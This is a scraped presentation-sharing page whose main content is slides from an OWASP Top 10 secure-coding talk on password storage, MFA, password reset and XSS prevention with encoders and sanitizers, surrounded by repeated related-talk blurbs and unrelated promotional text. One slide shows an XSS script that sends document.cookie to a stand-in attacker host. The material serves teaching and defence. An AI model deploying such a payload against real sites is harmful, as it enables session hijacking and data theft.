Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed.
This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities.
It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.
"Web Application Security" by Lee Christense at Utah Code Camp in March 2014. Covers SQL injection(SQLi), cross-site scripting(XSS), cross-site request forgery(CSRF), and password hashing.
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
In this talk, we'll cover the costs and risks of a data breach, plus the dangers of insider threat and shared database credentials
We'll also discuss what you can do about it. We'll cover the pros, cons, and lingering risks of secrets managers (the “secret zero” problem) plus review a new approach: passwordless database authentication.
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.
Let's face it, the web can be a dangerous place. So how do you protect your users and yourself? Tony Amoyal answers that and more as he shows how Rails can help protect against miscreants.
"Web Application Security" by Lee Christense at Utah Code Camp in March 2014. Covers SQL injection(SQLi), cross-site scripting(XSS), cross-site request forgery(CSRF), and password hashing.
Preventing Data Breaches: How to Tighten Your Security StanceSara Goodison
In this talk, we'll cover the costs and risks of a data breach, plus the dangers of insider threat and shared database credentials
We'll also discuss what you can do about it. We'll cover the pros, cons, and lingering risks of secrets managers (the “secret zero” problem) plus review a new approach: passwordless database authentication.
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.
Let's face it, the web can be a dangerous place. So how do you protect your users and yourself? Tony Amoyal answers that and more as he shows how Rails can help protect against miscreants.
Secure integration of cryptographic software. By modeling the variability in cryptography components, we help application developers configure the cryptography tasks they need. Presented at ONWARD! '15 in Pittsburgh.
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
Big corporations and financial institutions need secure pull printing services which guarantee a proper encryption, data access control and accountability. This research aimed to perform a MITM attack on multifunction printers with embedded software from the most popular vendors. The results are staggering - similar vulnerabilities have been found in multiple solutions which are exposed to breaking the encryption, collecting any prints from the server and printing at others' expense.
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was presented at the OWASP Belgium Chapter Meeting in May 2017.
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
OWASP - Open Web Applications Security Project to fundacja której celem jest eliminacja problemów bezpieczeństwa aplikacji. OWASP działa w duchu "open source" i dostarcza narzędzi, informacji i wiedzy pozwalających podnieść poziom bezpieczeństwa aplikacji. W trakcie wykładu przedstawię krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
More here: http://bit.ly/2OMTu4
Sudha Iyer of LogLogic and Slavik Markovich of Sentrigo discuss how hackers learn their trade and what you can do to protect your database.
Learn about methods for protecting against each type of attack, including secure coding practices, database hardening methods and deep-scanning database activity monitoring tools.
You will learn:
• How to think like a hacker (including a demonstration of basic hacking)
• SQL injection in depth
• How to avoid SQL injection problems
• User-defined DBMS security policies
• Taking control of SQL injection, buffer overflow and other privilege-escalation attacks
• How to preserve the confidentiality and integrity of your data
• Strategies for monitoring and analyzing database activities without impacting performance
The 7th June 2012 Linkedin was hacked. More than 6 million LinkedIn passwords was compromised. The real shocking news was not the theft but the fact that the attackers were able to decrypt many of these passwords. Why it happened? The answer is simple: a bad design of the password security. In this talk I presented how to choose "secure" user's passwords and how to safely store it from a programmer's perspective.
This talk has been presented during the MOCA 2012, http://moca.olografix.org/moca2012
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
Watch the slides of our webinar on “How to secure MongoDB with ClusterControl” and find out about the essential steps necessary to secure MongoDB and how to verify if your MongoDB instance is safe.
The recent MongoDB ransom hack caused a lot of damage and outages, while it could have been prevented with maybe two or three simple configuration changes. MongoDB offers a lot of security features out of the box, however it disables them by default.
In this webinar, we explain which configuration changes are necessary to enable MongoDB’s security features, and how to test if your setup is secure after enablement. We also demonstrate how ClusterControl enables security on default installations. And we cover how to leverage the ClusterControl advisors and the MongoDB Audit Log to constantly scan your environment, and harden your security even more.
AGENDA
What is the MongoDB ransom hack?
What other security threats are valid for MongoDB?
How to enable authentication / authorisation
How to secure MongoDB from ransomware
How to scan your system
ClusterControl MongoDB security advisors
Live Demo
SPEAKER
Art van Scheppingen is a Senior Support Engineer at Severalnines. He’s a pragmatic MySQL and Database expert with over 15 years experience in web development. He previously worked at Spil Games as Head of Database Engineering, where he kept a broad vision upon the whole database environment: from MySQL to Couchbase, Vertica to Hadoop and from Sphinx Search to SOLR. He regularly presents his work and projects at various conferences (Percona Live, FOSDEM) and related meetups.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Roy Levin, Microsoft
Mathias Scherman, Microsoft
Yotam Livny, Microsoft
As a Cloud Security provider, Azure Security Center collect logs from various services, that contain potentially vast security information. However, parsing them to extracting the most information is a hard task.
Artificial Intelligence techniques prove to perform well for such pattern recognition tasks. In this talk, we will present a novel approach leveraging recent advances in Deep Learning to detect malicious IaaS VMs being compromised, using Windows Security Events.
Nick Anderson, Facebook
Just as Microsoft grows to embrace the open source community more and more, we must use open source tools to help us grow as a community. In this talk we'll explore the various advanced detection techniques we employ at Facebook using osquery for Windows. Specifically, we will examine instrumenting Windows Event Log data, inspecting detailed attack patterns on processes such as path hijacking, and mapping operating system state to detect deviations of a healthy system - all at Facebook scale. Building on these detection capabilities, we will then consider different response features currently available in osquery and how one can extend these capabilities to suit the needs of their own enterprise. By striving to make these advanced detection capabilities more approachable we hope to raise the bar of defenses employed by companies everywhere and encourage the security community to take a more proactive role in developing detection features used to catch advanced exploitation.
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was updated and presented at the FSEC conference in Croatia, September 2017.
This study investigates users’ behavior in password utilization. Good password practices are critical to the security of any information system. End users often use weak passwords that are short, simple, and based on personal and meaningful information that can be easily guessed. A survey was conducted among executive MBA students who hold managerial positions. The results of the survey indicate that users practice insecure behaviors in the utilization of passwords. The results support the literature and can be used to guide password management policy.
In a dynamic infrastructure world, let's stop pretending credentials aren't public knowledge in an organization and just assume that they have already been leaked, now what?
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
In a society in where we can all see an exponential growth in hacking attacks, this presentation raises awareness of web security vulnerabilities, what web developers can do to protect their web applications and which tools are available to ease the task.
In particular, I'm going to provide an overview on the OWASP top ten vulnerabilities, then focusing on CSRF (Cross-Site Request Forgery) attack, showing how it works, the impacts it can have, and how it is possible to prevent it.
Finally, I will briefly describe the OWASP LAPSE project, a useful Eclipse plugin for detecting vulnerabilities in Java EE applications.
Secure integration of cryptographic software. By modeling the variability in cryptography components, we help application developers configure the cryptography tasks they need. Presented at ONWARD! '15 in Pittsburgh.
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
Big corporations and financial institutions need secure pull printing services which guarantee a proper encryption, data access control and accountability. This research aimed to perform a MITM attack on multifunction printers with embedded software from the most popular vendors. The results are staggering - similar vulnerabilities have been found in multiple solutions which are exposed to breaking the encryption, collecting any prints from the server and printing at others' expense.
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was presented at the OWASP Belgium Chapter Meeting in May 2017.
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
OWASP - Open Web Applications Security Project to fundacja której celem jest eliminacja problemów bezpieczeństwa aplikacji. OWASP działa w duchu "open source" i dostarcza narzędzi, informacji i wiedzy pozwalających podnieść poziom bezpieczeństwa aplikacji. W trakcie wykładu przedstawię krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
More here: http://bit.ly/2OMTu4
Sudha Iyer of LogLogic and Slavik Markovich of Sentrigo discuss how hackers learn their trade and what you can do to protect your database.
Learn about methods for protecting against each type of attack, including secure coding practices, database hardening methods and deep-scanning database activity monitoring tools.
You will learn:
• How to think like a hacker (including a demonstration of basic hacking)
• SQL injection in depth
• How to avoid SQL injection problems
• User-defined DBMS security policies
• Taking control of SQL injection, buffer overflow and other privilege-escalation attacks
• How to preserve the confidentiality and integrity of your data
• Strategies for monitoring and analyzing database activities without impacting performance
The 7th June 2012 Linkedin was hacked. More than 6 million LinkedIn passwords was compromised. The real shocking news was not the theft but the fact that the attackers were able to decrypt many of these passwords. Why it happened? The answer is simple: a bad design of the password security. In this talk I presented how to choose "secure" user's passwords and how to safely store it from a programmer's perspective.
This talk has been presented during the MOCA 2012, http://moca.olografix.org/moca2012
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
Watch the slides of our webinar on “How to secure MongoDB with ClusterControl” and find out about the essential steps necessary to secure MongoDB and how to verify if your MongoDB instance is safe.
The recent MongoDB ransom hack caused a lot of damage and outages, while it could have been prevented with maybe two or three simple configuration changes. MongoDB offers a lot of security features out of the box, however it disables them by default.
In this webinar, we explain which configuration changes are necessary to enable MongoDB’s security features, and how to test if your setup is secure after enablement. We also demonstrate how ClusterControl enables security on default installations. And we cover how to leverage the ClusterControl advisors and the MongoDB Audit Log to constantly scan your environment, and harden your security even more.
AGENDA
What is the MongoDB ransom hack?
What other security threats are valid for MongoDB?
How to enable authentication / authorisation
How to secure MongoDB from ransomware
How to scan your system
ClusterControl MongoDB security advisors
Live Demo
SPEAKER
Art van Scheppingen is a Senior Support Engineer at Severalnines. He’s a pragmatic MySQL and Database expert with over 15 years experience in web development. He previously worked at Spil Games as Head of Database Engineering, where he kept a broad vision upon the whole database environment: from MySQL to Couchbase, Vertica to Hadoop and from Sphinx Search to SOLR. He regularly presents his work and projects at various conferences (Percona Live, FOSDEM) and related meetups.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Roy Levin, Microsoft
Mathias Scherman, Microsoft
Yotam Livny, Microsoft
As a Cloud Security provider, Azure Security Center collect logs from various services, that contain potentially vast security information. However, parsing them to extracting the most information is a hard task.
Artificial Intelligence techniques prove to perform well for such pattern recognition tasks. In this talk, we will present a novel approach leveraging recent advances in Deep Learning to detect malicious IaaS VMs being compromised, using Windows Security Events.
Nick Anderson, Facebook
Just as Microsoft grows to embrace the open source community more and more, we must use open source tools to help us grow as a community. In this talk we'll explore the various advanced detection techniques we employ at Facebook using osquery for Windows. Specifically, we will examine instrumenting Windows Event Log data, inspecting detailed attack patterns on processes such as path hijacking, and mapping operating system state to detect deviations of a healthy system - all at Facebook scale. Building on these detection capabilities, we will then consider different response features currently available in osquery and how one can extend these capabilities to suit the needs of their own enterprise. By striving to make these advanced detection capabilities more approachable we hope to raise the bar of defenses employed by companies everywhere and encourage the security community to take a more proactive role in developing detection features used to catch advanced exploitation.
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was updated and presented at the FSEC conference in Croatia, September 2017.
This study investigates users’ behavior in password utilization. Good password practices are critical to the security of any information system. End users often use weak passwords that are short, simple, and based on personal and meaningful information that can be easily guessed. A survey was conducted among executive MBA students who hold managerial positions. The results of the survey indicate that users practice insecure behaviors in the utilization of passwords. The results support the literature and can be used to guide password management policy.
In a dynamic infrastructure world, let's stop pretending credentials aren't public knowledge in an organization and just assume that they have already been leaked, now what?
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
In a society in where we can all see an exponential growth in hacking attacks, this presentation raises awareness of web security vulnerabilities, what web developers can do to protect their web applications and which tools are available to ease the task.
In particular, I'm going to provide an overview on the OWASP top ten vulnerabilities, then focusing on CSRF (Cross-Site Request Forgery) attack, showing how it works, the impacts it can have, and how it is possible to prevent it.
Finally, I will briefly describe the OWASP LAPSE project, a useful Eclipse plugin for detecting vulnerabilities in Java EE applications.
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
In this presentation we will be looking at:
Common threats to the security of your website.
The various attack surfaces of a website; from the server, down the wire to presentation in the client browser.
Simple approaches to mitigating these threats.
Keeping web applications free from malicious attack is an arms race. From bruteforce attacks against your server through to browser based attacks to your pages once delivered (e.g. XSS, click jacking, cross site request forgery (CSRF)); there are many ways in which your web site is susceptible to attack.
Fortunately there are several established counter measures that are simply (if rarely) implemented that are effective in mitigating such threats.
We will look at the various modes of attack, review some real world examples and see how counter measures can be put in place.
The presentation is aimed at anyone responsible for delivering information over the web regardless of whether they are responsible for the hosting and administration of their web site. Covering measures you can implement yourself and measures you may wish supported by your hosting provider.
Topics covered:
Server hardening through the use of firewalls,
TLS/SSL implementation to protect delivery across the wire and
Secure response headers and Content Security Policies to protect your page once received by the user's browser.
The top two attack vectors for malware are email and web browsers. Watering-hole attacks conceal malware on member-based sites and phishing scams can target individuals with personal details. This PPT describes a different security approach to protect against these threats while achieving business growth, efficiency and lowered expenses. The presentation features Cisco Email, Web and Cloud Web Security and covers basic features, offers, benefits, newest features and product integrations. Watch the webinar: http://cs.co/9004BGqvy
We cannot “firewall” or “patch” our way to secure websites. In the past, security professionals thought firewalls, Secure Sockets Layer (SSL), patching, and privacy policies were enough. Today, however, these methods are outdated and ineffective, as attacks on prominent, well-protected websites are occurring every day. Most every organization in the world have something in common – they have had websites compromised in some way. No company or industry is immune. Programmers need to learn to build websites differently. This talk will review the top coding techniques developers need to master in order to build a low-risk, high-security web application.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities.
One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems. I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest (=attack) painful, or just rendered the scenarios irrelevant.
Similar to Application Security around OWASP Top 10 (20)
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus
As part of the DOE Integrated Research Infrastructure (IRI) program, NERSC at Lawrence Berkeley National Lab and ALCF at Argonne National Lab are working closely with General Atomics on accelerating the computing requirements of the DIII-D experiment. As part of the work the team is investigating ways to speedup the time to solution for many different parts of the DIII-D workflow including how they run jobs on HPC systems. One of these routes is looking at Globus Compute as a way to replace the current method for managing tasks and we describe a brief proof of concept showing how Globus Compute could help to schedule jobs and be a tool to connect compute at different facilities.
Code reviews are vital for ensuring good code quality. They serve as one of our last lines of defense against bugs and subpar code reaching production.
Yet, they often turn into annoying tasks riddled with frustration, hostility, unclear feedback and lack of standards. How can we improve this crucial process?
In this session we will cover:
- The Art of Effective Code Reviews
- Streamlining the Review Process
- Elevating Reviews with Automated Tools
By the end of this presentation, you'll have the knowledge on how to organize and improve your code review proces
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Shahin Sheidaei
Games are powerful teaching tools, fostering hands-on engagement and fun. But they require careful consideration to succeed. Join me to explore factors in running and selecting games, ensuring they serve as effective teaching tools. Learn to maintain focus on learning objectives while playing, and how to measure the ROI of gaming in education. Discover strategies for pitching gaming to leadership. This session offers insights, tips, and examples for coaches, team leads, and enterprise leaders seeking to teach from simple to complex concepts.
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaYara Milbes
Discover the transformative power of the WhatsApp API in our latest SlideShare presentation, "Top 7 Unique WhatsApp API Benefits." In today's fast-paced digital era, effective communication is crucial for both personal and professional success. Whether you're a small business looking to enhance customer interactions or an individual seeking seamless communication with loved ones, the WhatsApp API offers robust capabilities that can significantly elevate your experience.
In this presentation, we delve into the top 7 distinctive benefits of the WhatsApp API, provided by the leading WhatsApp API service provider in Saudi Arabia. Learn how to streamline customer support, automate notifications, leverage rich media messaging, run scalable marketing campaigns, integrate secure payments, synchronize with CRM systems, and ensure enhanced security and privacy.
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Software Engineering, Software Consulting, Tech Lead, Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Transaction, Spring MVC, OpenShift Cloud Platform, Kafka, REST, SOAP, LLD & HLD.
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
Developing Distributed High-performance Computing Capabilities of an Open Sci...Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...informapgpstrackings
Keep tabs on your field staff effortlessly with Informap Technology Centre LLC. Real-time tracking, task assignment, and smart features for efficient management. Request a live demo today!
For more details, visit us : https://informapuae.com/field-staff-tracking/
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxrickgrimesss22
Discover the essential features to incorporate in your Winzo clone app to boost business growth, enhance user engagement, and drive revenue. Learn how to create a compelling gaming experience that stands out in the competitive market.
12. Disable Browser Autocomplete
<form AUTOCOMPLETE="off">
<input AUTOCOMPLETE="off">
Only send passwords over HTTPS POST
Do not display passwords in browser
Input type=password
Store password based on need
Use a salt (de-duplication)
SCRYPT/PBKDF2 (slow, performance hit, easy)
HMAC (requires good key storage, tough)
[2][2]Password Defenses
13. 1) Do not limit the type of characters or
length*
of user password
•) Limiting passwords to protect against
injection is doomed to failure
•) Use proper encoder and other defenses
described instead
Password Storage
14. 2) Use a Cryptographically strong
credential-specific salt
•) Protect ([salt] + [password]);
•) Use a 32 char / 64 char salt
(may depend on protection function)
•) Do not depend on hiding / splitting /
otherwise obscuring the salt
Password Storage
15. 3) Impose difficult verification on attacker
ONLY
•) HMAC-SHA256 ([private key], [salt] + [password])
•) Protect the key as any private key
•) Store key outside the credential store (
•) Improvement over (solely) salted schemes; relies on
proper key creation & management
Password Storage
16. 4) Impose difficult verification on both
(impacts attacker more than defender)
•) pbkdf2([salt] + [password], c=10,000,000);
•) PBKDF2 when FIPS certification or
enterprise support on many platforms
required
•) Scrypt when resisting hardware accelerated
attacks is more important
Password Storage
17. Basic MFA Considerations
17
• Where do you send the token?
– Email (worst – yet, better than none!)
– SMS (ok)
– Mobile native app (good)
– Dedicated token (great)
– Printed Tokens (interesting)
• How do you handle thick clients?
– Email services, for example
– Dedicated and strong per-app passwords
18. Basic MFA Considerations
18
• How do you handle unavailable MFA devices?
– Printed back-up codes
– Fallback mechanism (like email)
– Call-in center
• How do you handle mobile apps?
– When is MFA not useful in mobile app scenarios?
19. “Forgot Password” design
Require identity questions
Last name, account number, email, DOB
Enforce lockout policy
Ask one or more good security questions
https://www.owasp.org/index.php/Choosing_and_Using_Security_Ques
tions_Cheat_Sheet
Send the user a randomly generated token via out-of-band
email, SMS or hardware / software token generator
Verify code in same web session
Enforce lockout policy
Change password
Enforce password policy
22. <script >
var badURL =
‘https://evileviljim.com/somesite/data=‘ +
document.cookie;
var img = new Image();
img.src = badURL;
</script>
<script>document.body.innerHTML=‘<blink>CYBER
IS COOL</blink>’;</script>
Anatomy of an XSS Attack
23. Impact of XSS
– Session Hijacking
– Site Defacement
– Network Scanning
– Undermining CSRF Defenses
– Site Redirection/Phishing
– Load of Remotely Hosted Scripts
– Data Theft
– Keystroke Logging
– Attackers using XSS more frequently
24. XSS Prevention (.NET)
• WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%>
• WebForms v4.0+ <%data%>
• MVC3+ Razor View Engine @data
• Data Binding in Web Forms v4 and below
<%#Server.HtmlEncode(Eval(“property”))%>
• Data Binding in v4.5 <%#Item.Property%>
• Better: ASP.Net 3.5 and below use AntiXss library directly
Microsoft.Security.Application.Encoder.HtmlEncode(message)
25. XSS Prevention (.NET)
• ASP.Net 4 (WebForms and MVC) <httpRuntime encoderType=
“Microsoft.Security.Application.AntiXssEncoder,AntiXssLibr
ary”/>
• ASP.Net 4.5 (AntiXss included in this version!)
<httpRuntime
encoderType=”System.WebSecurity.AntiXssEncoder,
System.Web, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b03f5f7f11d50a3a”/>
• JSON(MVC) Json.Encode(Model)
• Javascript encoding using AntiXss
Encoder.JavaScriptEncode(Model.FirstName)
28. • No third party libraries or configuration necessary
• This code was designed for high-availability/high-
performance encoding functionality
• Simple drop-in encoding functionality
• Performance, ESAPI integration
• More complete API (uri and uri component encoding,
etc) in some regards
• Java 1.5+
• Last updated January 30, 2014 (version 1.1.1)
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
OWASP Java Encoder Project
29. Web Page built in Java JSP is vulnerable to XSSWeb Page built in Java JSP is vulnerable to XSS
OWASP Java Encoder Project
Problem
Solution
1) <input type="text" name="data" value="<%=
Encode.forHtmlAttribute(dataValue) %>" />
2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" />
3) <button
onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">
click me
</button>
4) <script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(message) %>";
alert(msg);
</script>
33. • Writte in Java; lets you include HTML authored by third-parties in
your web application while protecting against XSS
• Has an extensive test suite, and has undergone adversarial
security review
https://code.google.com/p/owasp-java-html-sanitizer/wiki/At
tackReviewGroundRules
• Very easy to use
• Allows for simple programmatic POSITIVE policy configuration.
No XML config.
• << Caja project (Google)
High performance & low memory utilization
OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
34. Web Page is vulnerable to XSS because of untrusted HTMLWeb Page is vulnerable to XSS because of untrusted HTML
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
